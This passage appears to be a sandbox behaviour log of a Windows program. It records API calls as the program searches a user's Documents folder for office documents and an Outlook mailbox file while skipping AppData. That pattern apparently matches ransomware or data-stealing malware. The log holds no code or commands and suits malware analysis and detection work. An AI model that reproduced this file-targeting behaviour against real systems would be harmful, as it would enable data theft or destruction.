lpMsg=0x87e98c) returned 0 [0157.436] FindClose (in: hFindFile=0x90afd8 | out: hFindFile=0x90afd8) returned 1 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.437] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1300069, ftCreationTime.dwLowDateTime=0x424c, ftCreationTime.dwHighDateTime=0x8a7560, ftLastAccessTime.dwLowDateTime=0x4237, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x356310, ftLastWriteTime.dwHighDateTime=0x132006a, nFileSizeHigh=0x424c, nFileSizeLow=0x8a7250, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="痠\x8a\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.437] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.437] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.437] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0157.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.437] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.437] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.437] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.437] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.438] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.438] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x8e2af0, ftCreationTime.dwLowDateTime=0x9ba8d0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x8a20278, nFileSizeHigh=0x40d1, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.438] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdfb517b0, ftLastWriteTime.dwHighDateTime=0x1d5e261, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x87eb3c, dwReserved1=0x8a7560, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 1 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0x4bae3550, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 1 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xba16f910, ftLastWriteTime.dwHighDateTime=0x1d59824, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 1 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0x2088d820, ftLastWriteTime.dwHighDateTime=0x1d58a7a, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 1 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.440] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0157.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.440] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.440] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.440] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0157.440] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.440] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.440] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.440] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.440] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.443] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.443] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0157.443] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.443] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.443] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.443] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.443] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.444] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.444] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.444] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.444] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.466] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1160069, ftCreationTime.dwLowDateTime=0x42fd, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x122006a, nFileSizeHigh=0x42fd, nFileSizeLow=0x9ba7f8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="뚀詏\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.466] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.466] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.466] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.467] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x508ab760, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 1 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xe379aeb0, ftLastWriteTime.dwHighDateTime=0x1d59de2, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 1 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6050f080, ftCreationTime.dwHighDateTime=0x1d5dbad, ftLastAccessTime.dwLowDateTime=0x156f28d0, ftLastAccessTime.dwHighDateTime=0x1d5e282, ftLastWriteTime.dwLowDateTime=0x156f28d0, ftLastWriteTime.dwHighDateTime=0x1d5e282, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="x6khSA9uDUZMBxf", cAlternateFileName="X6KHSA~1")) returned 1 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.468] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.468] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf", cchCount1=15, lpString2="AppData", cchCount2=7) returned 3 [0157.468] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ea1c) returned 0 [0157.468] PeekMessageW (in: lpMsg=0x87ea1c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 